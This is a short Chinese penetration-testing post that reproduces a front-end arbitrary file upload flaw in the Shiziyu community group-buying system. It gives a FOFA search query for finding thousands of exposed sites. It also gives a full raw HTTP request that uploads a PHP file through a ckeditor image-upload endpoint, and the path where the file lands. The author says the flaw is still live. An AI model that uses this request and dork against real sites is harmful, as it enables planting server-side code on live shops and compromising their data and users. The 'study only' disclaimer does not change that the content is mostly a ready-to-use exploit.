以下文章来源于渗透安全团队 ,作者孤桜懶契
渗透安全团队 .
十年磨一剑,出鞘必锋芒,致力于分享渗透思路、光怪陆离的技巧和渗透知识总结。
文章来源:漏洞复现
狮子鱼前台任意文件上传复现
网站系统为狮子鱼社区团购系统,网上用的也比较多,我fofa上搜了一下,大概有6-7千多。主要用户各种购物,本文主要介绍其中的文件上传漏洞,漏洞复现以及漏洞工具分享。
FoFa语句
"/seller.php?s=/Public/login"
Payload
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Connection: close
Content-Length: 206
------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="shenye.php"
Content-Type: image/gif
<?php echo('shenye');?>
------WebKitFormBoundary8UaANmWAgM4BqBSs—
❝❞
「接着在当前路径可以发现上传成功」
/Common/image/uploads/163*****365.php
❝❞
发现目前依旧存在此漏洞,「仅限学习研究」❝